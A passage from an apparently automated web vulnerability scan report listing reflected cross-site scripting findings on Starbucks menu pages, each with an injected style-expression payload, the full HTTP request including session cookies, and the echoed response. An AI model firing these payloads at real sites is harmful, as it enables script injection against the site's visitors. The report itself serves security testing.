<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/gingerbread-latte?fb272"style="x:expression(alert(1))"511c9e6d392=1"/>
...[SNIP]...

2.121. http://www.starbucks.com/menu/drinks/espresso/iced-caffe-americano [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/iced-caffe-americano

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b26f3"style%3d"x%3aexpression(alert(1))"5d8d8ff815a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b26f3"style="x:expression(alert(1))"5d8d8ff815a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/iced-caffe-americano?b26f3"style%3d"x%3aexpression(alert(1))"5d8d8ff815a=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:26:51 GMT
Connection: close
Content-Length: 42566

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/iced-caffe-americano?b26f3"style="x:expression(alert(1))"5d8d8ff815a=1"/>
...[SNIP]...

2.122. http://www.starbucks.com/menu/drinks/espresso/iced-caffe-latte [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/iced-caffe-latte

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a85b"style%3d"x%3aexpression(alert(1))"5c1bfe82ef3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2a85b"style="x:expression(alert(1))"5c1bfe82ef3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/iced-caffe-latte?2a85b"style%3d"x%3aexpression(alert(1))"5c1bfe82ef3=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:26:24 GMT
Connection: close
Content-Length: 42746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/iced-caffe-latte?2a85b"style="x:expression(alert(1))"5c1bfe82ef3=1"/>
...[SNIP]...

2.123. http://www.starbucks.com/menu/drinks/espresso/iced-caffe-mocha [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/iced-caffe-mocha

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload feb2c"style%3d"x%3aexpression(alert(1))"fb386894d81 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as feb2c"style="x:expression(alert(1))"fb386894d81 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/iced-caffe-mocha?feb2c"style%3d"x%3aexpression(alert(1))"fb386894d81=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:27:08 GMT
Connection: close
Content-Length: 42988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/iced-caffe-mocha?feb2c"style="x:expression(alert(1))"fb386894d81=1"/>
...[SNIP]...

2.124. http://www.starbucks.com/menu/drinks/espresso/iced-caramel-macchiato [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/iced-caramel-macchiato

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7963d"style%3d"x%3aexpression(alert(1))"1846f5f581e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7963d"style="x:expression(alert(1))"1846f5f581e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/iced-caramel-macchiato?7963d"style%3d"x%3aexpression(alert(1))"1846f5f581e=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:27:15 GMT
Connection: close
Content-Length: 42903

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/iced-caramel-macchiato?7963d"style="x:expression(alert(1))"1846f5f581e=1"/>
...[SNIP]...

2.125. http://www.starbucks.com/menu/drinks/espresso/iced-cinnamon-dolce-latte [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/iced-cinnamon-dolce-latte

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80403"style%3d"x%3aexpression(alert(1))"2617616deb8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 80403"style="x:expression(alert(1))"2617616deb8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/iced-cinnamon-dolce-latte?80403"style%3d"x%3aexpression(alert(1))"2617616deb8=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:27:50 GMT
Connection: close
Content-Length: 43040

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/iced-cinnamon-dolce-latte?80403"style="x:expression(alert(1))"2617616deb8=1"/>
...[SNIP]...

2.126. http://www.starbucks.com/menu/drinks/espresso/iced-flavored-latte [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/iced-flavored-latte

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2e21"style%3d"x%3aexpression(alert(1))"78381d7a361 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a2e21"style="x:expression(alert(1))"78381d7a361 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/iced-flavored-latte?a2e21"style%3d"x%3aexpression(alert(1))"78381d7a361=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:27:51 GMT
Connection: close
Content-Length: 42981

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/iced-flavored-latte?a2e21"style="x:expression(alert(1))"78381d7a361=1"/>
...[SNIP]...

2.127. http://www.starbucks.com/menu/drinks/espresso/iced-gingerbread-latte [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/iced-gingerbread-latte

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15bbb"style%3d"x%3aexpression(alert(1))"b07d6033aae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 15bbb"style="x:expression(alert(1))"b07d6033aae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/iced-gingerbread-latte?15bbb"style%3d"x%3aexpression(alert(1))"b07d6033aae=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:27:50 GMT
Connection: close
Content-Length: 43417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/iced-gingerbread-latte?15bbb"style="x:expression(alert(1))"b07d6033aae=1"/>
...[SNIP]...

2.128. http://www.starbucks.com/menu/drinks/espresso/iced-peppermint-mocha [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/iced-peppermint-mocha

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3cd5e"style%3d"x%3aexpression(alert(1))"741f7a7ef73 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3cd5e"style="x:expression(alert(1))"741f7a7ef73 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/iced-peppermint-mocha?3cd5e"style%3d"x%3aexpression(alert(1))"741f7a7ef73=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:28:00 GMT
Connection: close
Content-Length: 43056

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/iced-peppermint-mocha?3cd5e"style="x:expression(alert(1))"741f7a7ef73=1"/>
...[SNIP]...

2.129. http://www.starbucks.com/menu/drinks/espresso/iced-peppermint-white-chocolate-mocha [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/iced-peppermint-white-chocolate-mocha

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e18af"style%3d"x%3aexpression(alert(1))"fb96fc1e474 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e18af"style="x:expression(alert(1))"fb96fc1e474 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/iced-peppermint-white-chocolate-mocha?e18af"style%3d"x%3aexpression(alert(1))"fb96fc1e474=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:28:04 GMT
Connection: close
Content-Length: 43381

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/iced-peppermint-white-chocolate-mocha?e18af"style="x:expression(alert(1))"fb96fc1e474=1"/>
...[SNIP]...

2.130. http://www.starbucks.com/menu/drinks/espresso/iced-pumpkin-spice-latte [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/iced-pumpkin-spice-latte

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebcde"style%3d"x%3aexpression(alert(1))"7566495fc72 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ebcde"style="x:expression(alert(1))"7566495fc72 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/iced-pumpkin-spice-latte?ebcde"style%3d"x%3aexpression(alert(1))"7566495fc72=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:28:25 GMT
Connection: close
Content-Length: 43588

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/iced-pumpkin-spice-latte?ebcde"style="x:expression(alert(1))"7566495fc72=1"/>
...[SNIP]...

2.131. http://www.starbucks.com/menu/drinks/espresso/iced-skinny-flavored-latte [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/iced-skinny-flavored-latte

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63d99"style%3d"x%3aexpression(alert(1))"d163db6da2d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 63d99"style="x:expression(alert(1))"d163db6da2d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/iced-skinny-flavored-latte?63d99"style%3d"x%3aexpression(alert(1))"d163db6da2d=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:27:55 GMT
Connection: close
Content-Length: 43267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/iced-skinny-flavored-latte?63d99"style="x:expression(alert(1))"d163db6da2d=1"/>
...[SNIP]...

2.132. http://www.starbucks.com/menu/drinks/espresso/iced-toffee-mocha [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/iced-toffee-mocha

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29fbd"style%3d"x%3aexpression(alert(1))"1ea5a8b090d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 29fbd"style="x:expression(alert(1))"1ea5a8b090d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/iced-toffee-mocha?29fbd"style%3d"x%3aexpression(alert(1))"1ea5a8b090d=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:28:22 GMT
Connection: close
Content-Length: 43039

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/iced-toffee-mocha?29fbd"style="x:expression(alert(1))"1ea5a8b090d=1"/>
...[SNIP]...

2.133. http://www.starbucks.com/menu/drinks/espresso/iced-white-chocolate-mocha [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/iced-white-chocolate-mocha

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee016"style%3d"x%3aexpression(alert(1))"f40cbb757bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ee016"style="x:expression(alert(1))"f40cbb757bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/iced-white-chocolate-mocha?ee016"style%3d"x%3aexpression(alert(1))"f40cbb757bf=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:28:11 GMT
Connection: close
Content-Length: 43213

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/iced-white-chocolate-mocha?ee016"style="x:expression(alert(1))"f40cbb757bf=1"/>
...[SNIP]...

2.134. http://www.starbucks.com/menu/drinks/espresso/peppermint-mocha [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/peppermint-mocha

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64dcf"style%3d"x%3aexpression(alert(1))"6458be98685 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 64dcf"style="x:expression(alert(1))"6458be98685 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/peppermint-mocha?64dcf"style%3d"x%3aexpression(alert(1))"6458be98685=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:28:17 GMT
Connection: close
Content-Length: 43641

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
